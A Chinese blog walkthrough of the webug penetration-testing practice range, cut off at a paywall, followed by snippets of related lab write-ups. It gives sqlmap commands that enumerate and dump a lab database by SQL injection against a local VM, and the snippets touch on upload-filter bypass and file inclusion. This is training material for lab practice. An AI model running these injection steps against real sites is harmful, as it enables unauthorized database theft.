webug靶场渗透基础攻略

最新推荐文章于 2024-05-20 09:28:54 发布
最新推荐文章于 2024-05-20 09:28:54 发布
阅读量5.3k 收藏 30
点赞数 7
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_28719743/article/details/83274749
版权

文章目录

安装

下载解压后,打开虚拟机
在这里插入图片描述
修改网络为桥接模式
在这里插入图片描述
虚拟机cmd中输入ipconfig查看局域网ip地址
在这里插入图片描述
我这边是192.168.0.101
浏览器访问一下
在这里插入图片描述
没毛病,第一步完成了,现在开始练习

第一关

在这里插入图片描述
这题目…一开始我就没明白要干什么
看了二三关的题目后,才明白过来是要找出id为1的值的flag
接下来我们使用sqlmap
查询当前的数据库名

sqlmap -u "http://192.168.0.101/pentest/test/sqli/sqltamp.php?gid=1" --current-db

在这里插入图片描述
查表

sqlmap -u "http://192.168.0.101/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab --tables

在这里插入图片描述
查字段

sqlmap -u "http://192.168.0.101/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab -T flag --columns

在这里插入图片描述
现在就可以查flag值了

sqlmap -u "http://192.168.0.101/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab -T flag -C flag,id --dump

在这里插入图片描述
答案就出来了,但是不用将这个值提交,因为看了源代码后发现提交页面并没有校验flag的功能,估计还没开发好

第二关

在这里插入图片描述
下载图片,用notepad打开一下
在这里插入图片描述
有个txt文件,解压后打开看看
在这里插入图片描述
貌似没更多信息
把’123’填入提交后,发现错了,再试’密码123’,‘123txt’都是错的,无奈下又看了下源代码,发现答案是’flang{fa136c7c341a6e26}’。中括号里面估计是md5值,那把fa136c7c341a6e26进行一下MD5解密,结果是‘chi

最低0.47元/天 解锁文章
Tomatosky
关注
  • 7
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透学习 webug4.0靶场
07-12
渗透学习 webug4.0靶场 渗透学习 webug4.0靶场 渗透学习 webug4.0靶场
靶场练习-Webug-渗透基础
Bcat_ZC的博客
07-06 124
016-输入www.taobao.com提示不行只能10.10.10.10访问,把host改为10.10.10.10不行,改referer也不行,查看资料,提示需要看源文件,其中源代码提示refer需要是百度才行,输入以后看到flag。根据提示跳转页面,查看网页代码和抓包,没有眉目,查看了一下网上的资料,发现如果有跳转漏洞,可以?003-按照提示,把网页文件去掉,看到有目录,其中test目录又有提示,按照提示将test加密,得到的和另一个目录一样的字符串,点开以后得到提示。013-xss漏洞,
Webug3.0靶场第一关学习
weixin_43460822的博客
07-09 938
前言:没有任何基础,且这是第一次接触靶场,不要说题目看不懂,就连如何进入靶场都成难题。知道自己不会还好,就怕明明不会、没有进入靶场且以为进入靶场误以为自己已成功进入靶场,我就是这样子。之前直接在win2003上打开靶场,就觉得自己对了,但不是这样子的,到现在我才知道如何进入靶场。 进入靶场方法 用winrar将安装包解压,用VM虚拟机打开解压文件里的win2003虚拟机文件。进入虚拟机系统后,...
渗透测试练习靶场汇总
最新发布
zz12345600354的博客
05-20 1024
Vulfocus 官网:在线演示:2.BUUCTF在线评测writeup文章:https://github.com/niudaii/my-vulstack-wphttps: //
webug靶场通关(1-5)
abv545411的博客
11-19 146
一个全新的界面,尝试点了其他的链接都打不开,发现一个搜索框,随便输入一些,页面都正常,当输入单引号时,页面报错。这道题的延时盲注步骤和第二关是一样的,就不多做赘述了,将拼接的sql语句附上,其中的表名,字段名自行替换。尝试单双引号的测试,有页面不正常的,看来也是可以用到布尔盲注的,我尝试了一下,布尔盲注也是也可以的。单双引号测试,单引号报错,使用单引号闭合,order by 2时正常,3不正常,所以是2个字段。仔细看和第一关的flag一样,看来得在其他表中找了,步骤是一样的,不过多赘述了。
打靶webug3.0前21题入坑总结
goddemon
05-23 467
第一题,前面的文章写过 第二题(考察文件捆绑和复原) 即文件捆绑且还原的方法状况,改为txt查看文件的代码后,发觉里面有个txt,如何将文件名改为zip用winrar打开即获得txt,打开txt即是密码 第三题(考察文件目录网页的获取与分析) 典型直接用目录爆破工具既可爆出 常用的目录爆出工具 御剑和dirbuster工具 爆破后进入网页,发觉提示去把目录名解密MD5,即解密MD532位的即目录拿回来即结束 第四题(考察利用burpsuite爆破) 这个就不给图了,直接考虑用burpsuite爆破常见
Webug4.0靶场通关笔记(第九天)--------完结篇
Yasso的博客
02-27 1040
一、文件包含漏洞 二、命令执行 三、webshell爆破 四、ssrf 明天就开学了~~唉,剩下的就都打完算了!!! 一、文件包含漏洞 文件包含漏洞在ctf上种类有很多,我接触过的有php伪协议、日志包含、目录遍历、session文件包含等等。全阐述的话我是讲不完(主要还是菜),就拿这webug4.0的靶场当例子吧. 打开靶场注意url栏(文件包含直接读取的是文件,而不是文件源码,所以要想办法读取源码(index.php),这里用的是base64读取) ?filename=php://fi
webug3.0渗透测试靶场
05-07
webug3.0渗透测试靶场!从官方虚拟机中提取出来的!代码优化,去除重复的文件!内附安装介绍及搭建工具!
billu-b0x靶场渗透
11-14
billu-b0x靶场渗透
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
WEB渗透学习-XSS-labs靶场
04-20
**XSS(跨站脚本击)学习指南:XSS-labs靶场详解** XSS,全称为Cross-Site Scripting,是网络安全领域常见的漏洞类型之一。它允许击者通过注入恶意脚本到Web页面中,进而对用户浏览器进行操控。XSS-labs是一个...
Webug靶场搭建详解
永远是少年
12-16 1723
今天继续给大家介绍渗透测试相关知识,本文主要内容是Webug靶场搭建详解。 一、Webug靶场简介 二、Webug靶场搭建
webug4.0靶场通关笔记
qq_47289634的博客
07-13 1258
这里我试了空格或者“.”绕过,::$DATA绕过,双后缀名绕过,%00截断但是都不可以,这里可以使用生僻字进行绕过,比如这个 龘(dá),在repeater里面将文件名改为 shell.php龘.jpg,发现上传成功,这是因为他无法对这个字进行编码,所以后面的信息全部被过滤掉了。所谓越权就是用普通用户拥有管理员用户的权限,比如user的id=1,管理员的id=0,通过抓包修改这个参数,就可以达到越权的目的。打开靶场地址,把id参数改为-1,发现跟1比起来,内容缩短了一些,回显不一样。
Webug4.0靶场通关
自强不息
02-05 2946
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
Webug靶场之旅——显错注入
weixin_53953503的博客
08-18 762
显错注入 显错注入是SQL注入的一种,而SQL注入是指web应用程序对用户输入数据的合法性没有判断,导致击者可以构造不同的sql语句来实现对数据库的操作。 SQL注入漏洞产生的条件:  1、用户能够控制数据的输入。  2、原本执行需要执行的代码时,拼接了用户的输入。 打开webug靶场,打开id为1的靶场后,如图: 这里我们使用工具的是Hackbar2.1.3版本,这个是免费的。 首先,我们需要判断是否存在SQL注入。在参数后面多加一个单引号,然后将它上传,发现报错了 通过页面的返回结果,
Webug4.0靶场搭建
BGiscool的博客
10-28 2247
Webug4.0靶场
Webug4.0靶场过关--注入
BGiscool的博客
11-01 1276
webug靶场过关秘籍
Windows 10系统下WeBug4.0靶场搭建
Ling_feng1101的博客
11-11 5028
Windows 10系统下WeBug4.0靶场搭建 最近在搭建webug4.0靶场时遇到一些蒙圈的问题,由于很长时间没有搭建过靶场了,在此简单记录一下。 资源链接:添加链接描述 提取码:3esy 注:源码版安装和虚拟机版安装里面都有教程 一:官方教程及说明 (1)准备工具:Phpstudy,Navicat ,Webug4.0 (2)安装步骤:安装phpstudy-安装Navicat -创建webug数据库-创建webug_sys数据库-创建webug_width_byte数据库-对应数据库名导入/sql/目
WeBug3.0靶场环境搭建与搭建资源分享
weixin_43460822的博客
07-06 3808
前言:这是我第一次接触WeBug靶场,以前也没有任何关于信息安全方面的基础,骨头虽硬,但还是得咬紧牙关去啃它,收获到的东西也必然很多。这是一遍关于初次认识WeBug靶场,初入靶场,请各位大佬轻喷。 一、WeBug3.0的基本了解 webug名称定义为“我们的漏洞”靶场环境,基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏...
pikachu渗透靶场网站搭建
10-08
渗透靶场网站的搭建是为了模拟真实环境下的网络击和安全测试。下面是一些步骤,可以帮助你搭建一个pikachu渗透靶场网站: 1. 选择合适的操作系统:你可以选择一个适合渗透测试的操作系统,例如Kali Linux或者Parrot OS。 2. 安装Web服务器:你需要在你的系统上安装一个Web服务器,如Apache、Nginx或者Microsoft IIS。 3. 创建虚拟环境:为了确保安全,最好在虚拟环境中搭建渗透靶场网站。你可以使用虚拟化软件如VirtualBox或者VMware来创建虚拟机。 4. 安装渗透测试工具和漏洞:在虚拟环境中安装一些常用的渗透测试工具和漏洞,如Metasploit、Nmap、Burp Suite、DVWA等。 5. 配置网络设置:为虚拟机设置网络连接,确保能够访问该靶场网站。 6. 搭建靶场网站:你可以使用一些开源的渗透测试训练平台来搭建靶场网站,如pikachu、OWASP WebGoat等。按照相应的文档说明进行部署和配置。 7. 启动渗透测试:一旦靶场网站搭建完毕,你就可以开始进行渗透测试。使用你安装的渗透测试工具,对靶场网站进行击并发现漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值